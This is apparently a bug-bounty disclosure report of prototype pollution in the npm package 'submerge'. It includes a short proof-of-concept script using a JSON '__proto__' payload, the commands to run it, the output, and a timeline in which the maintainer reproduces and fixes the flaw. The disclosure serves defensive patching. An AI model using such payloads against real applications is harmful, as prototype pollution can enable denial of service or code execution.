Prototype pollution in konfirm/node-submerge
Valid
Reported on
Aug 21st 2022
Description
submerge is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.
Proof of Concept
Create the following PoC file:
// poc.js
var merge = require("submerge")
let obj = {}
let payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}')
console.log("Before : " + {}.polluted);
merge(obj, payload);
console.log("After : " + {}.polluted);
Execute the following commands in another terminal:
npm i submerge # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : undefined
After : Yes! Its Polluted
Impact
May result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.
We are processing your report and will contact the
konfirm/node-submerge
team within 24 hours.
a year ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
a year ago
We have contacted a member of the
konfirm/node-submerge
team and are waiting to hear back
a year ago
Thank you for bringing this issue to my attention.
I have used the proof of concept code as the basis for a test scenario, was able to reproduce your finding and then resolve the issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
I'm glad that I could help in making your repo more secure Isn't there any bounty for this report? or at least a CVE? of course if it's possible for you, I would be really grateful
to join this conversation